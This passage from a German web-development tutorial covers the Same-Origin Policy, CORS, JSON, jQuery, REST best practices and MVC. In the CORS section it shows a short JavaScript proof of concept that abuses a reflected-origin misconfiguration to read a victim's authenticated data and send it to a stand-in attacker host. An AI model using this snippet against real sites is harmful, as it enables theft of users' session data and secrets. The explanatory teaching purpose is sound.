        <td>http://normal-website.com/example/</td>
        <td>Ja: gleiches Schema, Domäne und Port</td>
    </tr>
    <tr>
        <td>http://normal-website.com/example2/</td>
        <td>Ja: gleiches Schema, Domäne und Port</td>
    </tr>
    <tr>
        <td>https://normal-website.com/example/</td>
        <td>Nein: anderes Schema und Port</td>
    </tr>
    <tr>
        <td>http://en.normal-website.com/example/</td>
        <td>Nein: andere Domäne</td>
    </tr>
    <tr>
        <td>http://www.normal-website.com/example/</td>
        <td>Nein: andere Domäne</td>
    </tr>
    <tr>
        <td>http://normal-website.com:8080/example/</td>
        <td>Nein: anderer Port*</td>
    </tr>
</table>

*Internet Explorer lässt diesen Zugriff zu, da IE die Portnummer bei der Anwendung der Same-Origin-Policy nicht berücksichtigt.
<br><br>

## Warum ist Same-Origin-Policy notwendig? 

Wenn ein Browser eine HTTP-Anforderung von einem Ursprung an einen anderen sendet, werden alle Cookies, einschließlich Authentifizierungssitzungscookies, die für die andere Domäne relevant sind, ebenfalls als Teil der Anforderung gesendet. Das bedeutet, dass die Antwort innerhalb der Sitzung des Benutzers generiert wird und alle relevanten Daten enthält, die für den Benutzer spezifisch sind. Ohne die Same-Origin-Richtlinie wäre es beim Besuch einer schädlichen Website möglich, Ihre E-Mails von GMail, private Nachrichten von Facebook usw. zu lesen.
<br>

## Wie wird die Same-Origion-Policy umgesetzt? 

Die Same-Origin-Richtlinie steuert im Allgemeinen den Zugriff von JavaScript-Code auf Inhalte, die domänenübergreifend geladen werden. Das ursprungsübergreifende Laden von Seitenressourcen ist grundsätzlich erlaubt. Beispielsweise erlaubt die SOP das Einbetten von Bildern über das < img > Tag, Medien über das < video > Tag und JavaScript-Includes mit dem < script > Tag. Obwohl diese externen Ressourcen von der Seite geladen werden können, kann kein JavaScript auf der Seite den Inhalt dieser Ressourcen lesen.

Es gibt verschiedene Ausnahmen von der Same-Origin-Policy:

- Einige Objekte sind schreibbar, aber nicht domänenübergreifend lesbar, z.B. das **location** Objekt oder die **location.href** Eigenschaft von Iframes oder neuen Fenstern.
- Einige Objekte sind domänenübergreifend lesbar, aber nicht beschreibbar, z.B. die **length** Eigenschaft des **window** Objekts (die die Anzahl der auf der Seite verwendeten Frames speichert) und die **closed** Eigenschaft.
- Die **replace** Funktion kann generell domänenübergreifend auf dem **location** Objekt aufgerufen werden.
- Sie können bestimmte Funktionen domänenübergreifend aufrufen. Beispielsweise können Sie die Funktionen **close**, **blur** und **focus** in einem neuen Fenster aufrufen. Die **postMessage** Funktion kann auch auf Iframes und neuen Fenstern aufgerufen werden, um Nachrichten von einer Domäne zu einer anderen zu senden. 

Aufgrund von Legacy-Anforderungen ist die Richtlinie zum gleichen Ursprung beim Umgang mit Cookies lockerer, sodass sie häufig von allen Subdomains einer Website aus zugänglich sind, obwohl jede Subdomain technisch gesehen einen anderen Ursprung hat. **HttpOnly** mit dem Cookie-Flag können Sie dieses Risiko teilweise mindern .

Es ist möglich, die Same-Origin-Richtlinie mit **document.domain** zu lockern . Diese spezielle Eigenschaft ermöglicht es Ihnen, SOP für eine bestimmte Domäne zu lockern, aber nur, wenn sie Teil Ihres FQDN (vollqualifizierter Domänenname) ist. Sie haben beispielsweise eine Domain **marketing.example.com** und möchten den Inhalt dieser Domain auf example.com lesen. Dazu müssen beide Domains auf **example.com** gesetzt sein. Dann ermöglicht SOP den Zugriff zwischen den beiden Domänen trotz ihrer unterschiedlichen Herkunft. In der Vergangenheit war es möglich, **document.domain** eine TLD wie com, die den Zugriff zwischen beliebigen Domains auf derselben TLD ermöglichte, festzulegen, aber jetzt verhindern moderne Browser dies.
<br><br>

# Cross-Origin-Resource-Sharing CORS 
<br>

Cross-Origin-Resource-Sharing (CORS) ist ein Browser-Mechanismus, der den kontrollierten Zugriff auf Ressourcen ermöglicht, die sich außerhalb einer bestimmten Domäne befinden. Es erweitert die Same-Origin-Policy (SOP). Es bietet jedoch auch Potenzial für domänenübergreifende Angriffe, wenn die CORS-Richtlinie einer Website schlecht konfiguriert und implementiert ist. CORS ist kein Schutz vor Cross-Origin-Angriffen wie Cross-Site Request Forgery (CSRF). 

## Lockerung der Same-Origin-Policy 

Die Richtlinie zur gleichen Herkunft ist sehr restriktiv, und folglich wurden verschiedene Ansätze entwickelt, um die Beschränkungen zu umgehen. Viele Websites interagieren mit Subdomains oder Websites von Drittanbietern auf eine Weise, die einen vollständigen Cross-Origin-Zugriff erfordert. Mittels Cross-Origin Resource Sharing (CORS) ist eine kontrollierte Lockerung der Same-Origin-Policy möglich.

Das Cross-Origin Resource Sharing-Protokoll verwendet eine Reihe von HTTP-Headern, die vertrauenswürdige Webursprünge und zugehörige Eigenschaften definieren, z.B. ob authentifizierter Zugriff zulässig ist. Diese werden in einem Header-Austausch zwischen einem Browser und der Cross-Origin-Website, auf die er zuzugreifen versucht, kombiniert. 

## Schwachstellen, die sich aus CORS-Konfigurationsproblemen ergeben 

Viele moderne Websites verwenden CORS, um den Zugriff von Subdomains und vertrauenswürdigen Drittanbietern zu ermöglichen. Ihre Implementierung von CORS kann Fehler enthalten oder zu nachsichtig sein, um sicherzustellen, dass alles funktioniert, und dies kann zu ausnutzbaren Schwachstellen führen. 

## Vom Server generierter ACAO - Header aus dem vom Client angegebenen Origin-Header 

Einige Anwendungen müssen Zugriff auf eine Reihe anderer Domänen bereitstellen. Die Pflege einer Liste zulässiger Domänen erfordert ständige Bemühungen, und Fehler können die Funktionalität beeinträchtigen. Einige Anwendungen gehen daher den einfachen Weg, den Zugriff von jeder anderen Domäne effektiv zuzulassen.

Eine Möglichkeit, dies zu tun, besteht darin, den Ursprungs-Header von Anfragen zu lesen und einen Antwort-Header einzufügen, der angibt, dass der anfordernde Ursprung zulässig ist. Betrachten Sie beispielsweise eine Anwendung, die die folgende Anfrage erhält: 

```
GET /sensitive-victim-data HTTP/1.1
Host: vulnerable-website.com
Origin: https://malicious-website.com
Cookie: sessionid=...
```

Es antwortet dann mit: 

```
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://malicious-website.com
Access-Control-Allow-Credentials: true
``` 

Diese Header geben an, dass der Zugriff von der anfordernden Domäne (malicious-website.com) erlaubt ist und dass die ursprungsübergreifenden Anforderungen Cookies (Access-Control-Allow-Credentials: true) enthalten können und daher in der Sitzung verarbeitet werden.

Da die Anwendung beliebige Ursprünge im Access-Control-Allow-OriginHeader widerspiegelt, bedeutet dies, dass absolut jede Domäne auf Ressourcen aus der anfälligen Domäne zugreifen kann. Wenn die Antwort vertrauliche Informationen wie einen API-Schlüssel oder ein CSRF-Token enthält, können Sie diese abrufen, indem Sie das folgende Skript auf Ihrer Website platzieren: 

```
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
   location='//malicious-website.com/log?key='+this.responseText;
};
```
<br><br>

# JSON 
<br>

- JSON steht für **Java Script Object Notation**
- JSON ist ein einfaches Datenaustauschformat
- JSON ist einfacher Text, der in JavaScript-Objektnotation geschrieben ist
- JSON wird verwendet, um Daten zwischen Computern zu senden
- JSON ist sprachunabhängig 

*Die JSON-Syntax wird von der JavaScript-Objektnotation abgeleitet, aber das JSON-Format ist nur Text. Code zum Lesen und Generieren von JSON ist in vielen Programmiersprachen vorhanden.* 

## Warum JSON verwenden?

Das JSON-Format ähnelt syntaktisch dem Code zum Erstellen von JavaScript-Objekten. Aus diesem Grund kann ein JavaScript-Programm JSON-Daten problemlos in JavaScript-Objekte konvertieren.

Da es sich bei dem Format nur um Text handelt, können JSON-Daten problemlos zwischen Computern gesendet und von jeder Programmiersprache verwendet werden.

JavaScript hat eine eingebaute Funktion zum Konvertieren von JSON-Strings in JavaScript-Objekte:

**JSON.parse()**

JavaScript hat auch eine eingebaute Funktion zum Konvertieren eines Objekts in einen JSON-String:

**JSON.stringify()** 
<br><br>

## JSON-Syntaxregeln

Die JSON-Syntax wird von der JavaScript-Objektnotationssyntax abgeleitet:

- Daten befinden sich in Name/Wert-Paaren
- Daten werden durch Kommas getrennt
- Geschweifte Klammern halten Objekte
- Eckige Klammern halten Arrays

## JSON-Daten – Ein Name und ein Wert

JSON-Daten werden als Name/Wert-Paare (auch als Schlüssel/Wert-Paare bezeichnet) geschrieben.

Ein Name/Wert-Paar besteht aus einem Feldnamen (in doppelten Anführungszeichen), gefolgt von einem Doppelpunkt, gefolgt von einem Wert: 

```json
"name":"John"
``` 

## JSON - Wird zu JavaScript-Objekten ausgewertet 

Das JSON-Format ist fast identisch mit JavaScript-Objekten.

In JSON müssen Schlüssel Zeichenfolgen sein, die in doppelte Anführungszeichen geschrieben werden:

**JSON**

```json
{"name":"John"}
```

In JavaScript können Schlüssel Zeichenfolgen, Zahlen oder Bezeichnernamen sein:

**JavaScript**

```javascript
{name:"John"}
``` 

## JavaScript-Objekte

Da die JSON-Syntax von der JavaScript-Objektnotation abgeleitet ist, ist nur sehr wenig zusätzliche Software erforderlich, um mit JSON in JavaScript zu arbeiten.

Mit JavaScript können Sie ein Objekt erstellen und ihm Daten zuweisen, wie folgt:

```javascript
person = {name:"John", age:31, city:"New York"};
```
Sie können wie folgt auf ein JavaScript-Objekt zugreifen:

```
// returns John
person.name;
``` 

Daten können wie folgt geändert werden: 

```
person.name = "Gilbert";
``` 
<br><br>

# jQuery
<br>

- jQuery ist eine JavaScript-Bibliothek.
- jQuery vereinfacht die JavaScript-Programmierung erheblich.
- jQuery ist leicht zu erlernen. 

jQuery ist eine leichtgewichtige, „weniger schreiben, mehr tun“, JavaScript-Bibliothek.

Der Zweck von jQuery besteht darin, die Verwendung von JavaScript auf Ihrer Website erheblich zu vereinfachen.

jQuery übernimmt viele allgemeine Aufgaben, für deren Ausführung viele Zeilen JavaScript-Code erforderlich sind, und verpackt sie in Methoden, die Sie mit einer einzigen Codezeile aufrufen können.

jQuery vereinfacht auch viele der komplizierten Dinge von JavaScript, wie AJAX-Aufrufe und DOM-Manipulation.

Die jQuery-Bibliothek enthält die folgenden Funktionen:

- HTML/DOM-Manipulation
- CSS-Manipulation
- HTML-Ereignismethoden
- Effekte und Animationen
- AJAX
- Dienstprogramme 

## Herunterladen von jQuery

Es stehen zwei Versionen von jQuery zum Download bereit:

- Produktionsversion - Dies ist für Ihre Live-Website, da sie minimiert und komprimiert wurde
- Entwicklungsversion - dies dient zum Testen und Entwickeln (unkomprimierter und lesbarer Code)
  
Beide Versionen können von jQuery.com heruntergeladen werden.

Die jQuery-Bibliothek ist eine einzelne JavaScript-Datei, auf die Sie mit dem HTML < script > Tag verweisen (beachten Sie, dass sich das < script > Tag innerhalb des < head > Abschnitts befinden sollte): 

```
<head>
<script src="jquery-3.5.1.min.js"></script>
</head>
```
Wenn Sie jQuery nicht selbst herunterladen und hosten möchten, können Sie es von einem CDN (Content Delivery Network) einbinden.

Google ist ein Beispiel für jemanden, der jQuery hostet: 

```
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
```

## jQuery-Syntax

Die jQuery-Syntax ist maßgeschneidert für die Auswahl von HTML-Elementen und die Durchführung einiger Aktionen an den Elementen.

Die grundlegende Syntax lautet: **$(selector).action()**

- Ein $-Zeichen zum Definieren/Zugreifen auf jQuery
- Ein (selector) zum "Abfragen (oder Finden)" von HTML-Elementen
- Eine jQuery -action(), die für das/die Element(e) ausgeführt werden soll

Beispiele:

```
$(this).hide() - blendet das aktuelle Element aus.

$("p").hide() - blendet alle <p>-Elemente aus.

$(".test").hide() - blendet alle Elemente mit class="test" aus.

$("#test").hide() - verbirgt das Element mit id="test".
``` 

## Document Ready Event 

Dadurch soll verhindert werden, dass jQuery-Code ausgeführt wird, bevor das Dokument vollständig geladen ist (bereit ist).

Es empfiehlt sich, zu warten, bis das Dokument vollständig geladen und bereit ist, bevor Sie damit arbeiten. Auf diese Weise können Sie Ihren JavaScript-Code auch vor dem Hauptteil Ihres Dokuments im Head-Bereich platzieren.

Hier sind einige Beispiele für Aktionen, die fehlschlagen können, wenn Methoden ausgeführt werden, bevor das Dokument vollständig geladen ist:

- Es wird versucht, ein noch nicht erstelltes Element auszublenden
- Es wird versucht, die Größe eines noch nicht geladenen Bildes abzurufen

```
$(document).ready(function(){

  // jQuery methods go here...

});
``` 

## jQuery-Selektoren

Mit jQuery-Selektoren können Sie HTML-Elemente auswählen und bearbeiten.

jQuery-Selektoren werden verwendet, um HTML-Elemente basierend auf ihrem Namen, ihrer ID, ihren Klassen, Typen, Attributen, Werten von Attributen und vielem mehr zu „finden“ (oder auszuwählen). Es basiert auf den vorhandenen CSS-Selektoren und verfügt zusätzlich über einige eigene benutzerdefinierte Selektoren.

Alle Selektoren in jQuery beginnen mit dem **Dollarzeichen und Klammern: $()**. 

## Der Elementselektor

Der jQuery-Elementselektor wählt Elemente basierend auf dem Elementnamen aus.

< p > Sie können alle Elemente auf einer Seite wie folgt auswählen :

```
$("p")
```

Beispiel

Wenn ein Benutzer auf eine Schaltfläche klickt, werden alle < p > Elemente ausgeblendet: 

```
$(document).ready(function(){
  $("button").click(function(){
    $("p").hide();
  });
});
```

## Der #id-Selektor

Der jQuery-Selektor verwendet das id-Attribut eines HTML-Tags, um das spezifische Element #id zu finden. 

Eine ID sollte innerhalb einer Seite eindeutig sein, daher sollten Sie den #id-Selektor verwenden, wenn Sie ein einzelnes, eindeutiges Element finden möchten.

Um ein Element mit einer bestimmten ID zu finden, schreiben Sie ein Hash-Zeichen, gefolgt von der ID des HTML-Elements:

```
$("#test")
```

## Der .class-Selektor

Der jQuery.class-Selektor findet Elemente mit einer bestimmten Klasse.

Um Elemente mit einer bestimmten Klasse zu finden, schreiben Sie einen Punkt, gefolgt vom Namen der Klasse:

```
$(".test")
```

## Weitere Beispiele für jQuery-Selektoren 

<table>
    <tr>
        <th>Syntax</th>
        <th>Beschreibung</th>
    </tr>
    <tr>
        <td>$("*")</td>
        <td>Selects all elements</td>
    </tr>
    <tr>
        <td>$(this)</td>
        <td>Selects the current HTML element</td>
    </tr>
    <tr>
        <td>$("p:first")</td>
        <td>Selects the first < p > element</td>
    </tr>
    <tr>
        <td>$("ul li:first")</td>
        <td>Selects the first < li > element of the first < ul ></td>
    </tr>
    <tr>
        <td>$("[href]")</td>
        <td>Selects all elements with an href attribute</td>
    </tr>
    <tr>
        <td>$(":button")</td>
        <td>Selects all < button > elements and < input > elements of type="button"</td>
    </tr>
    <tr>
        <td>$("tr:even")</td>
        <td>Selects all even < tr > elements</td>
    </tr>
</table> 

## Was sind Events?

Alle verschiedenen Besucheraktionen, auf die eine Webseite reagieren kann, werden als Events/Ereignisse bezeichnet.

Ein Event stellt den genauen Moment dar, in dem etwas passiert.

Beispiele:

- Bewegen einer Maus über ein Element
- Auswählen eines Optionsfelds
- Klicken Sie auf ein Element
  
Der Begriff „fires/firedfeuert/gefeuert“ wird häufig bei Veranstaltungen verwendet. Beispiel: "Das Tastendruck-Ereignis wird ausgelöst, sobald Sie eine Taste drücken". 

## jQuery-Syntax für Eventmethoden 

In jQuery haben die meisten DOM-Ereignisse eine äquivalente jQuery-Methode.

Um allen Absätzen auf einer Seite ein Klickereignis zuzuweisen, können Sie Folgendes tun:

```
$("p").click();
```

Der nächste Schritt besteht darin, zu definieren, was passieren soll, wenn das Event ausgelöst wird. Sie müssen dem Event eine Funktion übergeben:

```
$("p").click(function(){
  // action goes here!!
});
```
## Häufig verwendete jQuery-Eventmethoden 

Die **$(document).ready()** Methode ermöglicht es uns, eine Funktion auszuführen, wenn das Dokument vollständig geladen ist. 

```
$(document).ready()
``` 

Die **click()** Methode hängt eine Event-Handler-Funktion an ein HTML-Element an.
Die Funktion wird ausgeführt, wenn der Benutzer auf das HTML-Element klickt. 

```
click()
```

Beispiel

Das folgende Beispiel sagt: Wenn ein Klickereignis auf einem < p > Element ausgelöst wird; aktuelles < p >Element ausblenden: 

```
$("p").click(function(){
  $(this).hide();
});
``` 
<br><br>

# RESTful Web Services 

**Representational State Transfer (REST)** ​​ist ein Software-Architekturstil, der entwickelt wurde, um das Design und die Entwicklung der Architektur für das World Wide Web zu leiten. REST definiert eine Reihe von Einschränkungen dafür, wie sich die Architektur eines verteilten Hypermedia-Systems im Internetmaßstab, wie z.B. das Web, verhalten sollte.

Der REST-Architekturstil betont die Skalierbarkeit von Interaktionen zwischen Komponenten, einheitliche Schnittstellen, unabhängige Bereitstellung von Komponenten und die Schaffung einer mehrschichtigen Architektur, um das Zwischenspeichern von Komponenten zu erleichtern, um die vom Benutzer wahrgenommene Latenz zu reduzieren, Durchsetzung von Sicherheit und Kapselung von Legacy- Systemen.

REST wird in der gesamten Softwarebranche eingesetzt und ist ein weithin akzeptierter Satz von Richtlinien zum Erstellen zustandsloser, zuverlässiger Web-APIs. Eine Web-API, die die REST-Einschränkungen erfüllt, wird informell als RESTful bezeichnet. RESTful-Web-APIs basieren in der Regel lose auf HTTP-Methoden für den Zugriff auf Ressourcen über URL-codierte Parameter und die Verwendung von JSON oder XML zur Datenübertragung.

Da RESTful-Webdienste mit HTTP-URL-Pfaden arbeiten, ist es sehr wichtig, einen RESTful-Webdienst auf die gleiche Weise wie eine Website zu schützen.

Im Folgenden sind die Best Practices aufgeführt, die beim Entwerfen eines RESTful-Webdienstes eingehalten werden müssen: 

- **Validierung** – Alle Eingaben auf dem Server validieren. Schützen Sie Ihren Server vor SQL- oder NoSQL-Injection-Angriffen.

- **Sitzungsbasierte Authentifizierung** – Verwenden Sie die sitzungsbasierte Authentifizierung, um einen Benutzer immer dann zu authentifizieren, wenn eine Anfrage an eine Webdienstmethode gestellt wird.

- **Keine sensiblen Daten in der URL** – Verwenden Sie niemals Benutzername, Passwort oder Sitzungstoken in einer URL, diese Werte sollten über die POST-Methode an den Webdienst übergeben werden.

- **Einschränkung der Methodenausführung** − Ermöglicht die eingeschränkte Verwendung von Methoden wie GET, POST und DELETE. Die GET-Methode sollte keine Daten löschen können.

- **Validate Malformed XML/JSON** – Prüfen Sie auf wohlgeformte Eingaben, die an eine Webdienstmethode übergeben wurden.

- **Allgemeine Fehlermeldungen ausgeben** – Eine Webdienstmethode sollte HTTP-Fehlermeldungen wie 403 verwenden, um anzuzeigen, dass der Zugriff verboten ist usw. 

## HTTP-Code 

<table>
    <tr>
        <th>HTTP-Code</th>
        <th>Beschreibung</th>
    </tr>
    <tr>
        <td>200</td>
        <td>OK − zeigt Erfolg an.</td>
    </tr><tr>
        <td>201</td>
        <td>CREATED – wenn eine Ressource erfolgreich mit einer POST- oder PUT-Anforderung erstellt wurde. Gibt den Link zur neu erstellten Ressource mithilfe des Standortheaders zurück.</td>
    </tr>
    <tr>
        <td>204</td>
        <td>KEIN INHALT – wenn der Antworttext leer ist. Beispielsweise eine DELETE-Anfrage</td>
    </tr>
    <tr>
        <td>304</td>
        <td>NOT MODIFIED – Wird verwendet, um die Nutzung der Netzwerkbandbreite im Falle von bedingten GET-Anforderungen zu reduzieren. Der Antworttext sollte leer sein. Überschriften sollten Datum, Ort usw. enthalten.</td>
    </tr>
    <tr>
        <td>400</td>
        <td>BAD REQUEST – gibt an, dass eine ungültige Eingabe bereitgestellt wird. Zum Beispiel Validierungsfehler, fehlende Daten.</td>
    </tr>
    <tr>
        <td>401</td>
        <td>UNAUTHORIZED – gibt an, dass der Benutzer ein ungültiges oder falsches Authentifizierungstoken verwendet.</td>
    </tr>
    <tr>
        <td>403</td>
        <td>FORBIDDEN – gibt an, dass der Benutzer keinen Zugriff auf die verwendete Methode hat. Zum Beispiel Zugriff ohne Administratorrechte löschen.</td>
    </tr>
    <tr>
        <td>404</td>
        <td>NOT FOUND – gibt an, dass die Methode nicht verfügbar ist.</td>
    </tr>
    <tr>
        <td>409</td>
        <td>CONFLICT – gibt die Konfliktsituation während der Ausführung der Methode an. Zum Beispiel das Hinzufügen eines doppelten Eintrags.</td>
    </tr>
    <tr>
        <td>500</td>
        <td>INTERNAL SERVER ERROR – gibt an, dass der Server beim Ausführen der Methode eine Ausnahme ausgelöst hat.</td>
    </tr>
</table>
<br><br>

# Model-View-Controller MVC 

Model-View-Controller ( MVC ) ist ein Software-Entwurfsmuster, das üblicherweise für die Entwicklung von Benutzeroberflächen verwendet wird, das die zugehörige Programmlogik in drei miteinander verbundene Elemente unterteilt. Dies geschieht, um interne Darstellungen von Informationen von der Art und Weise zu trennen, wie Informationen dem Benutzer präsentiert und von ihm akzeptiert werden. 

Dieses Muster, das traditionell für grafische Desktop-Benutzeroberflächen (GUIs) verwendet wurde, wurde für das Entwerfen von Webanwendungen populär. Beliebte Programmiersprachen haben MVC-Frameworks, die die Implementierung des Musters erleichtern. 

## Komponenten 

- **Model** - Die zentrale Komponente des Musters. Es ist die dynamische Datenstruktur der Anwendung, unabhängig von der Benutzeroberfläche. Es verwaltet direkt die Daten, Logik und Regeln der Anwendung.
- **View** - Jede Darstellung von Informationen wie Diagramme oder Tabellen. Es sind mehrere Ansichten derselben Informationen möglich, z.B. ein Balkendiagramm für das Management und eine tabellarische Ansicht für Buchhalter.
- **Controller** - Akzeptiert Eingaben und wandelt sie in Befehle für das Modell oder die View um.
  
Zusätzlich zur Aufteilung der Anwendung in diese Komponenten definiert das Model-View-Controller-Design die Interaktionen zwischen ihnen. 

Das Model ist für die Verwaltung der Daten der Anwendung verantwortlich. Es empfängt Benutzereingaben vom Controller. 

Die Ansicht rendert die Darstellung des Models in einem bestimmten Format. 

Der Controller reagiert auf die Benutzereingabe und führt Interaktionen mit den Datenmodellobjekten durch. Der Controller empfängt die Eingabe, validiert sie optional und übergibt die Eingabe dann an das Model.

Wie bei anderen Softwaremustern drückt MVC den "Kern der Lösung" für ein Problem aus und ermöglicht gleichzeitig die Anpassung an jedes System. 

![MVC](images/mvc.png) 
